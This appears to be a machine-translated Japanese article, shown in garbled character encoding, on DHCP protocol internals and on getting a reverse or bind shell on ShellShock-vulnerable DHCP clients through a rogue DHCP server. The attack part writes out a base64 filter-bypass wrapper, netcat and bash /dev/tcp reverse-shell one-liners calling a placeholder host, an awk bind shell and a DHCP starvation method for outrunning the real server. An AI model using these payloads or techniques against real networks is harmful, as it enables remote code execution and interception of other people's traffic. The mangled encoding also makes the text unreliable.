ãã®èšäºã§ã¯ãDHCPã¯ã©ã€ã¢ã³ãã§ShellShockã䜿çšããŠãå®å šãªãªããŒã¹ã·ã§ã«ãŸãã¯ãã€ã³ãã·ã§ã«ãååŸããæ¹æ³ã説æããŸãã ã€ã³ã¿ãŒãããã«ã¯ãDHCPã¯ã©ã€ã¢ã³ãã§shellshockã䜿çšããå¯èœæ§ã«ã€ããŠèª¬æããèšäºãå€æ°ãããŸãã DHCPã¯ã©ã€ã¢ã³ãã§ãªããŒã¹ã·ã§ã«ãååŸããæ¹æ³ã«é¢ããèšäºããããŸãã ãã ããã·ã§ã«ãååŸããããã®å®å®ããæ®éçãªããŒã«ã¯ãŸã ãããŸããã ãããã¯ã«ãã人ã¯ããã§æ°ãããã®ãèŠãããšãã§ããªããããããŸããããDHCPã¯ã©ã€ã¢ã³ãåŽã®æåã®ãã£ã«ã¿ãªã³ã°ãšãšã¹ã±ãŒãã®æ¡ä»¶ã§ãéã®åä¿¡ãšãã€ã³ãã·ã§ã«ã®èªååãã©ã®ããã«ç®¡çããããç¥ãããå ŽåããããŸãã ããã«ãDHCPãããã³ã«ãäœã«é¢å¿ããããã«ã€ããŠèª¬æããŸãã
DHCPã¯ãIPã¢ãã¬ã¹ãããã©ã«ãã²ãŒããŠã§ã€ãDNSãµãŒããŒãªã©ãèªåçã«å²ãåœãŠãããã«äœ¿çšãããŸãã ãã®ãããã³ã«ã¯ãã©ã³ã¹ããŒããšããŠUDPã䜿çšããŸããã€ãŸããããŒã¿ãªã³ã¯ã¬ã€ã€ãŒããéå§ããŠããããã¯ãŒã¯ãã±ããã®å¯Ÿè±¡ãšãªããã¹ãŠã®ãã£ãŒã«ããç°¡åã«çœ®ãæããããšãã§ããŸãããœãŒã¹MACã¢ãã¬ã¹ããœãŒã¹IPã¢ãã¬ã¹ããœãŒã¹ããŒã-ã€ãŸãããã¹ãŠãããã
DHCPã¯åäœããŸããã äžèšã§èšãã° ãã®ãããªãã®ïŒ
DHCPDISCOVERã¯ã©ã€ã¢ã³ãã¯ããããã¯ãŒã¯å ã®DHCPãµãŒããŒãèŠã€ããããã«ãããŒããã£ã¹ããããã¯ãŒã¯ãã±ãããéä¿¡ããŸãããããŒã¿ãªã³ã¯ã¬ã€ã€ãŒã§ã¯ãã¹ãŠãæ確ã§ããããã以äžèª¬æããŸããããããã¯ãŒã¯-ç§ãã¡ã®çµéšã«åºã¥ããŠãããã«äœãããããŸã-ã¯ã©ã€ã¢ã³ãã«ãã£ãŠç°ãªããŸããã
SRC IP: 0.0.0.0, DST IP: 255.255.255.255.
ãã©ã³ã¹ããŒãã¬ãã«ã§ã¯ããã¹ãŠã®ãªã¯ãšã¹ãã¯æ¬¡ã®ããã«éä¿¡ãããŸãã
SRC PORT: 68, DST PORT: 67
ãããã£ãŠããµãŒããŒãã¯ã©ã€ã¢ã³ãã«å¿çãããšãïŒ
SRC PORT: 67, DST PORT: 68
UDPãã§ãã¯ãµã ã¯ç¡èŠã§ããŸãã ããããã§ãã¯ããåäžã®DHCPãµãŒããŒãèŠãããšã¯ãªãããããã¯ãŒã¯æ©åšã¯UDPãã§ãã¯ãµã ã®å€ããŒãã®ãã±ãããåé¡ãªãæž¡ããŸãã ã¢ããªã±ãŒã·ã§ã³ã¬ãã«ã®æåã®ãã€ãïŒopãã£ãŒã«ã-ã¡ãã»ãŒãžã¿ã€ãïŒã§ãã¯ã©ã€ã¢ã³ãã¯å€-0x01ïŒBOOTREQUEST-ã¯ã©ã€ã¢ã³ããããµãŒããŒãžã®èŠæ±ïŒãèšå®ããŸãã ããã±ãŒãžã®æ®ãã®ãã£ãŒã«ãã«ã€ããŠã¯èª¬æããŸããããã®èª¬æãé·ããããã³å€ã¯RFCããã³WIKIã«ããããã§ãã ã¯ã©ã€ã¢ã³ãããã®ãªã¯ãšã¹ãã§ã¯ã xidãã£ãŒã«ãã«ãé¢å¿ããããŸã ïŒãã©ã³ã¶ã¯ã·ã§ã³IDã¯ãããã±ãŒãžã®ã¢ããªã±ãŒã·ã§ã³ã¬ãã«ã®å é ãããªãã»ãã0x4ã«ãã4ãã€ãã®ä¹±æ°ã§ãïŒã å¿çå ã®ãµãŒããŒãxidãã£ãŒã«ããã¯ã©ã€ã¢ã³ãã®xidãšçãããªãããã«èšå®ããå Žåãã¯ã©ã€ã¢ã³ãã¯ãµãŒããŒããã®å¿çãæåŠããŸããããã¯ããã®å¿çãå¥ã®ãã©ã³ã¶ã¯ã·ã§ã³ã«ãããšèŠãªãããã§ãã ããã±ãŒãžã®DHCPãªãã·ã§ã³ã«ã€ããŠè©³ããèŠãŠã¿ãŸãããã ãããã®256ããããå®å šãªãªã¹ãã¯ãããŸãã¯ããã§èŠã€ããããšãã§ããŸã ã ã¯ã©ã€ã¢ã³ãã¯ãã³ãŒã53 ïŒ DHCPã¡ãã»ãŒãžã®ã¿ã€ãã¯DHCPã¡ãã»ãŒãžïŒã®ãªãã·ã§ã³ã0x01ã«èšå®ããå¿ èŠããããŸããããã¯ããã®ããã±ãŒãžãDHCPãµãŒããŒãèŠã€ããããã®ãã®ã§ããããªãã·ã§ã³55 ïŒ ãã©ã¡ãŒã¿ãŒèŠæ±ãªã¹ã㯠ãã²ãŒããŠã§ã€ã¢ãã¬ã¹ããµãããããã¹ã¯ãªã©ããµãŒããŒããèŠæ±ããããã©ã¡ãŒã¿ãŒã®ãªã¹ãã§ããããšãæå³ããŸããDNSãµãŒããŒãªã©ïŒã
ããã¯ãWireSharkã§ã®ãã®ãªã¯ãšã¹ãã®å€èŠ³ã§ãã
DHCPOFFERãµãŒããŒã¯ãã¯ã©ã€ã¢ã³ãããèŠæ±ãåä¿¡ããææ¡ãéä¿¡ããŸãã ãããã¯ãŒã¯ã¬ãã«ã§ã¯ãIPãµãŒããŒã¯ãã®IPã¢ãã¬ã¹ãSRCãšããŠèšå®ããŸããDSTã®IPã¯255.255.255.255ã§ããå¿ èŠããããŸãããåžžã«ãããšã¯éããŸããã DST IPã§ã¯ãã¯ã©ã€ã¢ã³ãã«å²ãåœãŠãããIPã¢ãã¬ã¹ãŸãã¯ãªã¬ãŒIPã¢ãã¬ã¹ïŒããã»ã¹ã«é¢ä¿ããå ŽåïŒãèšå®ã§ããŸãã ãŸã IPã¢ãã¬ã¹ãæã£ãŠããªãå Žåããã±ããã¯ã©ã®ããã«ã¯ã©ã€ã¢ã³ãã«å°éããã®ã§ããããïŒ ãã¹ãŠãç°¡åã§ããDHCPDISCOVERããã³DHCPREQUESTèŠæ±ã§ã¯ã chaddr ïŒã¯ã©ã€ã¢ã³ãMACã¢ãã¬ã¹ïŒãã£ãŒã«ãã§ãã¯ã©ã€ã¢ã³ãã¯ãã®MACã¢ãã¬ã¹ã瀺ããŸãã
ãããã£ãŠããµãŒããŒãŸãã¯ãªã¬ãŒã¯åžžã«ããŒã¿ãªã³ã¯ã¬ãã«ã§ãã±ãããé ä¿¡ããå Žæãç¥ã£ãŠããŸãããµãŒããŒãŸãã¯ãªã¬ãŒã¯åžžã«ã¯ã©ã€ã¢ã³ããšåããããŒããã£ã¹ããã¡ã€ã³å ã«ããããããã¯ãŒã¯ã¬ãã«ã§äœãèµ·ãããã¯ããã»ã©éèŠã§ã¯ãªãããã§ããUDPããžãã¯ã ã¡ãã»ãŒãžã¿ã€ãã§ã¯ãå€ã¯0x02 ïŒBOOTREPLY-ã¯ã©ã€ã¢ã³ããžã®ãµãŒããŒå¿çïŒã§ãã xidãã£ãŒã«ãã«ã¯ãã¯ã©ã€ã¢ã³ãèŠæ±ã®xidãã£ãŒã«ãã®å€ã«çããå€ãèšå®ãããŸãã yiaddr ïŒããªãã®ïŒã¯ã©ã€ã¢ã³ãïŒIPã¢ãã¬ã¹ïŒãã£ãŒã«ãã¯ããµãŒããŒã«ãã£ãŠææ¡ãããã¯ã©ã€ã¢ã³ãã®IPã¢ãã¬ã¹ãèšå®ããŸãã DHCPãªãã·ã§ã³ã«è¡šç€ºããããã®ïŒã³ãŒã53ïŒ DHCPã¡ãã»ãŒãžã¿ã€ã ïŒã®ãªãã·ã§ã³ã§ã¯ãå€ã¯0x02ïŒDHCPOFFERïŒãã³ãŒã51ïŒ IPã¢ãã¬ã¹ãªãŒã¹æé ïŒã¯IPã¢ãã¬ã¹ãªãŒã¹æéãã³ãŒã54ïŒ ãµãŒããŒèå¥å ïŒã¯DHCP IPã¢ãã¬ã¹ã§ã-ãµãŒããŒã ãªãã¡ãŒã®ä»ã®ãã¹ãŠã®ãªãã·ã§ã³ã¯ãã¯ã©ã€ã¢ã³ããèŠæ±ãããã©ã¡ãŒã¿ãŒã«ãã£ãŠç°ãªããŸã;ã¯ã©ã€ã¢ã³ãã¯ããªãã·ã§ã³ã³ãŒã55ïŒ ãã©ã¡ãŒã¿ãŒèŠæ±ãªã¹ã ïŒã®DHCPDISCOVERèŠæ±ã§ãªã¹ããæå®ããŸããã
DHCPREQUESTã¯ã©ã€ã¢ã³ãã¯ããµãŒããŒã«ãããã¯ãŒã¯ãã©ã¡ãŒã¿ã®èŠæ±ãéä¿¡ããŸãã ãããã¯ãŒã¯ã¬ãã«ã§ã¯ã
SRC IP: 0.0.0.0 DST IP: 255.255.255.255
ããã«ãªãSRC IP: 0.0.0.0 DST IP: 255.255.255.255
ãããµãŒããŒã®ãªãã¡ãŒïŒ yiaddrãã£ãŒã«ãïŒã§å²ãåœãŠãããIPã¢ãã¬ã¹ã¯SRC IPã«èšå®ãããIPã¯DST IPã«èšå®ãããŸãã³ãŒã54ïŒ ãµãŒããŒèå¥å ïŒã®ãµãŒããŒãªãã¡ãŒãªãã·ã§ã³ã«ããã¢ãã¬ã¹ã ãã®ãªã¯ãšã¹ãã®DHCPãªãã·ã§ã³ã¯ãã³ãŒã53ïŒ DHCPã¡ãã»ãŒãžã¿ã€ããDHCPã¡ãã»ãŒãžã®ã¿ã€ã ïŒã0x03ã«çãããªãã·ã§ã³ãé€ããDHCPDISCOVERãªã¯ãšã¹ããšéãã¯ãããŸãã-ããã¯ããã®ãã±ãããDHCPãµãŒããŒããã®ãã©ã¡ãŒã¿ãŒããªã¯ãšã¹ãããããšãæå³ããŸãã ãŸããã¯ã©ã€ã¢ã³ãã¯ã³ãŒã54ïŒ èŠæ±ãããIPã¢ãã¬ã¹ ïŒã®ãªãã·ã§ã³ãšåæ§ã«ãµãŒããŒã®IPã¢ãã¬ã¹ãæ¢ã«ç¥ã£ãŠãããããã³ãŒã54ïŒ ãµãŒããŒèå¥å ïŒã®ãªãã·ã§ã³ãèŠæ±ã«è¿œå ããŸãã ããã«ãã¯ã©ã€ã¢ã³ãã¯ãªãã·ã§ã³12ïŒ ãã¹ãåãªãã·ã§ã³ã®ãã¹ãåïŒãªã©ãèšå®ã§ããŸãã
- DHCPACKãµãŒããŒã¯ãã¯ã©ã€ã¢ã³ãã«ç¢ºèªãéä¿¡ããŸãã ãããã¯ãŒã¯ã¬ãã«ã§ã¯ã
SRC IP: <IP- > DST IP: 255.255.255.255
ã ãã®ãã±ããã®ãªãã·ã§ã³ãšãã£ãŒã«ãã¯ãã³ãŒã53ïŒ DHCPã¡ãã»ãŒãžã¿ã€ããDHCPã¡ãã»ãŒãžã®ã¿ã€ã ïŒã0x05ã«çãããªãã·ã§ã³ãé€ããDHCPOFFERãšå€ãããŸãã-ããã¯ããã®ãã±ãããDHCPãµãŒããŒããã®ç¢ºèªã§ããããšãæå³ããŸãã
ããã«ã ARPãããã³ã«ã䜿çšããã¯ã©ã€ã¢ã³ãã¯ãããŒã«ã«ãããã¯ãŒã¯å ã®IPã¢ãã¬ã¹ã®ç«¶åãæ€åºããããšããŸãïŒ ã¢ãã¬ã¹ç«¶åã®æ€åº ïŒã 競åãæ€åºãããªãå Žåãã¯ã©ã€ã¢ã³ãã¯DHCPACKããåä¿¡ãããã©ã¡ãŒã¿ãŒããããã¯ãŒã¯ã€ã³ã¿ãŒãã§ã€ã¹ã«èšå®ããŸãã æ€åºãããå Žåãã¯ã©ã€ã¢ã³ãã¯DHCP DHCPDECLINEãããŒããã£ã¹ããšã©ãŒã¡ãã»ãŒãžãéä¿¡ããŸã ããã®åŸãIPã¢ãã¬ã¹ãååŸããæé ãç¹°ãè¿ãããŸãã
ãŸããDHCPãããã³ã«ã«ã¯å¥ã®æ©èœããããŸããã¯ã©ã€ã¢ã³ãã以åã«DHCPDISCOVERèŠæ±ãéä¿¡ããå Žåãåããããã¯ãŒã¯ã«åæ¥ç¶ãããšãã¯ã©ã€ã¢ã³ãã¯ããã«DHCPREQUESTãéä¿¡ããŸãã åæã«ãã³ãŒã50ïŒ Requested IP address ïŒã®DHCPãªãã·ã§ã³ã§ã¯ã以åã«ååŸããIPã¢ãã¬ã¹ãèšå®ãããŸãã
åè¿°ã®DHCPDECLINEã«ã€ããŠè©³ããèŠãŠãããŸãããã å®éã«ã¯ã次ã®ããã«ãªããŸãã
ãã®ãããã¯ãŒã¯ã«æ¢ã«æ¥ç¶ããŠãããããã¯ã©ã€ã¢ã³ãã¯DHCPREQUESTãéä¿¡ããŸãã
Transaction ID: 0x825b824a; Requested IP: 192.168.1.171; Client MAC address: 08:00:27:ce:7a:64
ãµãŒããŒã¯DHCPACKã§å¿çããŸã ã
Transaction ID: 0x825b824a; yiaddr: 192.168.1.171; siaddr: 192.168.1.1; router: 192.168.1.1
ã¯ã©ã€ã¢ã³ãã¯ARPãããã³ã«ã䜿çšããŠã²ãŒããŠã§ã€ã®MACã¢ãã¬ã¹ãæ€çŽ¢ããåãARPãä»ããŠããŒã«ã«ãããã¯ãŒã¯å ã®IPã¢ãã¬ã¹ã®ç«¶åãæ€åºããããšããŸãïŒ ã¢ãã¬ã¹ç«¶åæ€åº ïŒã ãªã¯ãšã¹ãã¯æ¬¡ã®ããã«ãªããŸãã
sender mac: 08:00:27:ce:7a:64; sender ip: 0.0.0.0; target mac: 00:00:00:00:00:00; target ip: 192.168.1.171
IPã¢ãã¬ã¹ã192.168.1.171ã®ãã¹ããARPèŠæ±ã«å¿çããŠããŸãã
ã¯ã©ã€ã¢ã³ãããããã¯ãŒã¯äžã®IPã¢ãã¬ã¹ã®ç«¶åãæ€åºãããããŒããã£ã¹ãDHCPDECLINEãéä¿¡ããŠããŸãã
Transaction ID: 0x825b824a; Requested IP: 192.168.1.171; ciaddr: 192.168.1.171
- IPã¢ãã¬ã¹ãååŸããæé ãç¹°ãè¿ãããŸãããç°ãªããã©ã³ã¶ã¯ã·ã§ã³IDïŒ 0x713a0fe7ã䜿çšãããŸãã çªå·ã89ã101ã106ã136ãããã³151ã®ããã±ãŒãžã«æ°ä»ããŸãããïŒ ãã®å ŽåããµãŒããŒãã¯ã©ã€ã¢ã³ãã«IPã¢ãã¬ã¹192.168.1.172ãå²ãåœãŠããã®åã«DHCPãµãŒããŒèªäœãåãARP ïŒçªå·89ã101ã106ã®ãã±ããïŒ
Who has 192.168.1.172? Tell 192.168.1.1
ïŒIPã¢ãã¬ã¹192.168.1.172ã空ããŠããããšã確èªããŠããã DHCPOFFERãéä¿¡ããŸãã ã ãã®åŸãã¯ã©ã€ã¢ã³ãã¯åã³IPã¢ãã¬ã¹ã®ç«¶åãèå¥ããããšããŸããïŒçªå·136ã151ã®ãã±ããïŒWho has 192.168.1.172? Tell 0.0.0.0
ïŒã
å°ãªããšãäžåºŠãããã¯ãŒã¯ã«æ¥ç¶ããã¯ã©ã€ã¢ã³ããDHCPREQUESTèŠæ±ã®ã¿ãéä¿¡ãã以åã«åä¿¡ããIPã¢ãã¬ã¹ãRequestedã«å ¬éããããšã¯æ¢ã«ããã£ãŠããŸãã ããããDHCPãµãŒããŒããã®IPã¢ãã¬ã¹ãæ¢ã«å²ãåœãŠãæ§æãŸãã¯ã¢ãã¬ã¹æå®ãå€æŽããããµãŒããŒãã¯ã©ã€ã¢ã³ãã«ãã®ã¢ãã¬ã¹ãæäŸã§ããªãå Žåã¯ã©ãã§ããããã ããã«ã¯DHCPNAKã¡ãã»ãŒãžã¿ã€ãããããŸãã 次ã®ããã«æ©èœããŸãã
ã¯ã©ã€ã¢ã³ãã¯DHCPREQUESTãéä¿¡ããŸãã
Transaction ID: 0xa7ddc5cb; Requested IP: 192.168.1.14
ãµãŒããŒèšå®ã¯ãIPã¢ãã¬ã¹ãå²ãåœãŠãããšãã§ããç¯å²ãæå®ããŸãããã¯ã©ã€ã¢ã³ããèŠæ±ãããã®ã¯ãã®ç¯å²ã«å«ãŸããªãããããµãŒããŒã¯DHCPNAKãéä¿¡ããŸã ã
Transaction ID: 0xa7ddc5cb; Message: address not available
- IPã¢ãã¬ã¹ãååŸããæé ãç¹°ãè¿ãããŸããããã©ã³ã¶ã¯ã·ã§ã³IDãç°ãªããŸãïŒ 0xcfbf77a9 ã
ã·ã§ã«ã·ã§ãã¯ã«ç§»ããŸããã
ãã®è匱æ§ã¯æãäžè¬çãªè匱æ§ã®1ã€ã§ãããããã«é¢ããéåžžã«å€ãã®èšäºããããããshellshockãã©ã®ããã«ããªãåäœããã®ããæžãæå³ã¯ãããŸããã DHCPãµãŒããŒãšããŠåäœããå Žåã«åããŠãDHCPã¯ã©ã€ã¢ã³ãã§ã·ã§ã«ãååŸããæ¹æ³ã«ã€ããŠè©³ãã説æããããšããå§ãããŸãã
ã©ã®ãã£ãŒã«ããšãªãã·ã§ã³ãæ¿å ¥ã§ããŸããïŒ
åçïŒã»ãŒãã¹ãŠïŒ æ¿å ¥ã§ããDHCPãªãã·ã§ã³ã®ã³ãŒãã®ãªã¹ãã¯æ¬¡ã®ãšããã§ãïŒCentOS 6.5ããNetworkManagerã§ãã¹ãæžã¿ïŒïŒ14ã18ã43ã56ã60ã61ã62ã63ã64ã66ã67ã77ã80ã82ã83 ã 84ã86ã87ã90ã94ã95ã96ã97ã98ã99ã100ã101ã102ã103ã104ã105ã106ã107ã108ã109ã110ã111ã113ã114ã115 ã 116ã117ã120ã122ã123ã124ã125ã126ã127ã128ã129ã130ã131ã132ã133ã134ã135ã136ã137ã138ã139ã140ã141ã142ã143 ã 144ã145ã146ã147ã148ã149ã150ã151ã152ã153ã154ã155ã156ã157ã158ã159ã160ã161ã162ã163ã164ã165ã166ã167ã168 ã 169ã170ã171ã172ã173ã174ã175ã176ã177ã178ã179ã180ã181ã182ã183ã184ã185ã186ã187ã188ã189ã190ã191ã192ã193 ã194ã195ã196ã198ã199ã200ã201ã202ã203ã204ã205ã206ã207ã208ã209ã210ã211ã212ã213ã214ã215ã216ã217ã218ã219 ã 220ã22 1ã222ã223ã224ã225ã226ã227ã228ã229ã230ã231ã232ã233ã234ã235ã236ã237ã238ã239ã240ã241ã242ã243ã244ã245ã 246ã247ã248ã250ã251ã253ã
PoCã§ã¯ãã³ãŒã114ïŒ URL ïŒã§DHCPãªãã·ã§ã³ã䜿çšããŸãã ãªãã§ïŒ ãã®é·ãã¯å¯å€ïŒæ倧é·ã¯256ãã€ãïŒã§ããããŸã誰ãã䜿çšããŠããããã§ã ã 圌女ã®èª¬æã¯ãŸã ããã«ãããŸã ã ãã®ãªãã·ã§ã³ã䜿çšããŠshellshockã«å¯ŸããŠè匱ãªã·ã¹ãã ãæŽæ°ããæ¹æ³ã«é¢ããèšäºããããŸã:)
ç§ãã¡ã®å¶éã¯äœã§ããïŒ
åçïŒãããããããŸãïŒ
- é·ã-256ãã€ã
- ã€ã³ã¿ãŒããªã¿ãŒã³ãã³ãã®ã¿ã䜿çšããããšãã§ããŸãã
- 䜿çšãããæåã«é¢ãã倧ããªå¶éïŒããã€ãã¯ãã£ã«ã¿ãŒãããããã€ãã¯ãšã¹ã±ãŒããããŸãã DHCPã¯ã©ã€ã¢ã³ãã«äŸåããŸãã 以äžã¯ãã©ãã§ã䜿çšã§ããªãæåã®ã»ããã§ãã
"';&|
- ã³ãã³ãã®å®è¡åŸãIPv4ã¢ãã¬ã¹ãå²ãåœãŠãããªãå ŽåããããŸãããã®å Žåãã€ã³ã¿ãŒãã§ã€ã¹ã§IPv6ç¡èŠãæå¹ã«ãªã£ãŠããªãå ŽåãIPv6ãªã³ã¯ããŒã«ã«ã¢ãã¬ã¹ã䜿çšã§ããŸãã
- 絶察ãã¹ã䜿çšããå¿ èŠããããŸãã䜿çšããªããšãã³ãã³ãã倱æããå ŽåããããŸã
ãããŠãäœããã¹ããïŒ
åçïŒå¶éãåé¿ããŠãã ããïŒ
ãã£ã«ã¿ããã€ãã¹ããã«ã¯ã1ã€ã®ã³ãã³ãã§ãã¹ãŠãå®è¡ããå¿
èŠããããŸãã ãã®ããã«ããŸãããïŒ
/bin/sh <(/usr/bin/base64 -d <<< Base64String)
ããã§ã¯ãã€ã³ã¿ãŒããªã¿ãŒ/ bin / shã®å ¥åã«ã Base64Stringã¹ããªã³ã°ããã³ãŒããã/ usr / bin / base64ã®åºåãéããŸãã ãããã£ãŠããã§ã«34ãã€ãã䜿çšããŠãããããBase64Stringã®é·ãã¯222ãã€ããè¶ ããŠã¯ãªããŸããã
ãããŠãBase64Stringã§äœãèµ·ããã§ããããïŒ 4çªç®ã®å¶éãå¿ããªãã§ãã ããããããã£ãŠããŸãã次ã®ã³ãã³ãã§ã€ã³ã¿ãŒãã§ã€ã¹ã®IPã¢ãã¬ã¹ãèšå®ããŸãã
/bin/ip addr add <IP>/<MASK> dev eth0;
ãã®ã³ãã³ãã«ã¯ãã1ã€ã®å¶éããããŸããIPã¢ãã¬ã¹ãèšå®ããã€ã³ã¿ãŒãã§ã€ã¹ã®ååãç¥ãå¿ èŠããããŸãã ããã©ã«ãã§ã¯ãã·ã§ã«ã·ã§ãã¯ããŸã æ®ã£ãŠããå€ãããŒãžã§ã³ã®Linuxã§ã¯ãæåã®ãããã¯ãŒã¯ã€ã³ã¿ãŒãã§ã€ã¹ã¯eth0ãšåŒã°ããã®ã§ãããã«çŠç¹ãåãããŸãã ãŸãããã®è¡ã«éã·ã§ã«ãŸãã¯ãã€ã³ãã·ã§ã«ãé 眮ããå¿ èŠããããŸãã
éã·ã§ã«ã§ã¯ãncã䜿çšããŠæšæºã·ã§ã«ã䜿çšããŸãã
nc -e /bin/sh <IP> <PORT> 2>&1 & rm /tmp/f 2>/dev/null;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <IP> <PORT> >/tmp/f &
éã·ã§ã«ã®å Žåã次ã®ã³ãã³ãã䜿çšã§ããŸã ã
/bin/bash -i >& /dev/tcp/<IP>/<PORT> 0>&1
ãã€ã³ãã·ã§ã«ã®å Žå ã Metasploitã® / cmd / unix / bind_awkãæçã®1ã€ãšããŠäœ¿çšããŸãã
awk 'BEGIN{s="/inet/tcp/<PORT>/0/0";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}' &
PoC
ãããªïŒ
ãã£ãš å°ã DHCPã«ã€ããŠ
DHCPã¯ãã¯ã©ã€ã¢ã³ãäžã§RCEãååŸããæ¹æ³ãšããŠã®ã¿èæ ®ãããã¹ãã§ã¯ãããŸãããæåã«ããããã¯ãŒã¯äžã®å®éã®DHCPãµãŒããŒãããéãå¿çããå¿ èŠãããã2çªç®ã«ãã¯ã©ã€ã¢ã³ããã·ã§ã«ã·ã§ãã¯ãæããªããã°ãªããªãããã§ãã DHCPãããã³ã«ã¯ãæåã«MITMãå®è£ ããæ¹æ³ãšèŠãªãå¿ èŠããããŸãã
DHCPãµãŒããŒãããé«éã«èŠæ±ã«å¿çããæ¹æ³ã«ã€ããŠè©±ããŸãããã æãæçœãªãªãã·ã§ã³ã¯ããããã¯ãŒã¯äžã®å Žæã«ãã£ãŠã¯ã©ã€ã¢ã³ãã«è¿ã¥ããããšã§ãããããŒããŠã§ã¢ãšã¢ã«ãŽãªãºã ãé«éã«åäœããã¯ãã§ãã ãã ããã»ãšãã©ã®å Žåãããã¯ããã§ã¯ãããŸããã
2çªç®ã®ãªãã·ã§ã³ããããŸãããµãŒããŒãããŒãããå¿ èŠããããŸããã空ãã¢ãã¬ã¹ã®ããŒã«å šäœã䜿ãæãããªãããã«ãããã¯ãŒã¯äžã®æ°ããIPã¢ãã¬ã¹ãå æããªãã§ãã ããïŒãã®ãããªæ»æã¯DHCPæ¯æžãšåŒã°ããŸãïŒã æ¢ã«ç解ããŠããããã«ããµãŒããŒã¯ããããã®èŠæ±ãåŠçããããã«å¿ããŠDHCPOFFERãéä¿¡ããå¿ èŠããããããå€æ°ã®DHCPDISCOVERèŠæ±ãéä¿¡ããå¿ èŠããããŸãã ãã ãããã®ãã©ã³ã¶ã¯ã·ã§ã³ã®äžéšãšããŠDHCPREQUESTãéä¿¡ããªãããããµãŒããŒã¯ãããåŸ æ©ããŸãã IPãååŸããæé ãå®äºããŠããªããããIPã¢ãã¬ã¹ã¯å°çšãšã¯èŠãªãããŸããã
å®éã«ã©ã®ããã«èŠãããèŠãŠã¿ãŸãããã
DHCPDISCOVERèŠæ±ãéä¿¡ããåã«ã°ã©ããšããã»ã¹ãããŒãããŸãã
ãã®å³ã¯ãã«ãŒã¿ãŒã®å¹³åè² è·ã0.1ãã0.3ã®ç¯å²ã§ãããdnsmasqããã»ã¹ãCPUã®0ïŒ ãå ããããšã瀺ããŠããŸãã
DHCPDISCOVERèŠæ±ãéä¿¡ãããšãã«ãã°ã©ããããã»ã¹ãããã³DHCPã¯ã©ã€ã¢ã³ãã®ãªã¹ããããŒãããŸãã
ã«ãŒã¿ãŒã®è² è·å¹³åã¯1.96ã«å¢å ãããã¹ãŠã®DHCPDISCOVERèŠæ±ã«å¿çããæéããªããªããŸãããdnsmasqããã»ã¹ã¯CPUã®64ïŒ ã䜿çšããŸãããåæã«DHCPã¯ã©ã€ã¢ã³ãã®ãªã¹ãã«ã¯ãã¹ãã®ã¿ãå«ãŸããŸãã
ãã®çµæãç§ãã¡ãšãµãŒããŒã«ã¯å°ãè² è·ãããããIPã¢ãã¬ã¹ã¯ååŸãããŸããã§ããã çæãããã¹ãŠã®DHCPDISCOVERèŠæ±ãé€å€ãããšãå®éã®DHCPãµãŒããŒãããéãå¿çããå¯èœæ§ãå€§å¹ ã«é«ãŸããŸãã ã¿ã¹ã¯ã¯å®äºããŸããã
次ã«ãDHCPã¡ãã»ãŒãžã®ã¿ã€ãã«ã€ããŠèª¬æããŸã ã
äŸ¡å€ | Message_Type |
---|---|
1 | DHCPDISCOVER |
2 | DHCPOFFER |
3 | DHCPREQUEST |
4 | DHCPDECLINE |
5 | DHCPACK |
6 | DHCPNAK |
7 | DHCPRELEASE |
8 | DHCPINFORM |
ãã§ã«èª¿ã¹ãæåã®6çš®é¡ã®ã¡ãã»ãŒãžã«ã¯ã7çªç®ïŒDHCPRELEASEïŒãš8çªç®ïŒDHCPINFORMïŒã®2ã€ãããããŸããã ãããã«ã€ããŠè©³ããèŠãŠãããŸãããã
ã¯ã©ã€ã¢ã³ãã¯ãIPã¢ãã¬ã¹ã®ãªãŒã¹ãæ瀺çã«çµäºã§ããŸãã ãããè¡ãããã«ã DHCPRELEASEã¢ãã¬ã¹ãªãŒã¹ãªãªãŒã¹ã¡ãã»ãŒãžãã以åã«ã¢ãã¬ã¹ãæäŸãããµãŒããŒã«éä¿¡ããŸãã ä»ã®ã¡ãã»ãŒãžãšã¯ç°ãªããããã¯ãããŒããã£ã¹ããããŸããã
DHCPINFORMæ å ±ã¡ãã»ãŒãžã¯ ãIPã¢ãã¬ã¹ãæåã§æ§æãããŠããã¯ã©ã€ã¢ã³ãã®è¿œå ã®ãããã¯ãŒã¯ãã©ã¡ãŒã¿ãŒã決å®ããããšãç®çãšããŠããŸãã ç§ãã¡ã®çµéšã«åºã¥ããŠãWindowsãã¹ãã®ã¿ããã®ãããªã¡ãã»ãŒãžãéä¿¡ãããšèšãããšãã§ããŸã:(ããµãŒããŒã¯IPã¢ãã¬ã¹ãå²ãåœãŠãã«åæ§ã®DHCPACKãªã¯ãšã¹ãã«å¿çããŸãããããã®ã¡ãã»ãŒãžçšã®rfcãããžã§ã¯ãããããŸãã ãDNSãªã©ãäž»ãªããšã¯å®éã®DHCPãµãŒããŒã®åã«å¿çããããšã§ããããã®åé¡ã¯ãã§ã«äžèšã§è§£æ±ºãããŠããŸãã
DHCPæ¯æžãšDHCPãªã¬ãŒãšãŒãžã§ã³ã
ãã®èšäºã§ã¯ãDHCPæ¯æžæ»æ-ããªãŒIPã¢ãã¬ã¹ã®ããŒã«ã®æ¯æžã«ã€ããŠèšåããŸããã ã©ã³ãã ãªMACã¢ãã¬ã¹ããå€æ°ã®DHCPDISCOVERãŸãã¯DHCPREQUESTèŠæ±ã®ã¿ãéä¿¡ããããšã«ãããã®æ»æãå®è¡ããããšãå¯èœã§ãããšèããããŠããããã®ãããªèŠæ±ããšã«DHCPãµãŒããŒã¯IPã¢ãã¬ã¹ãå²ãåœãŠãŠäºçŽããŸãããããã¯åžžã«ããã§ã¯ãããŸããã æ¢ã«ç¥ã£ãŠããããã«ãIPã¢ãã¬ã¹ãååŸããŠäºçŽããæé ã¯ãDHCPãµãŒããŒãDHCPACKã¡ãã»ãŒãžãéä¿¡ãããšçµäºããŸãã DHCPãªã¬ãŒãšãŒãžã§ã³ããšããŠè¡šç€ºããããã®æ»æãå®è¡ããã®ãæãæ£ããã§ãã
以äžã«äŸã瀺ããŸãã
ãããã¯ãŒã¯ã€ã³ã¿ãŒãã§ã€ã¹ã¯enp0s3ã§ãMACã¢ãã¬ã¹ã¯08ïŒ00ïŒ27ïŒ6aïŒ82ïŒ5fã§ãIPã¢ãã¬ã¹ã¯192.168.1.2ã§ãã DHCPãµãŒããŒã¯ã OpenWrt Chaos Calmer 05/15/1 IPã¢ãã¬ã¹ããã®Dnsmasq / 2.73ã«ãªããŸãïŒ 192.168.1.1
- ãªã¯ãšã¹ãã®éä¿¡ãéå§ããŸãã
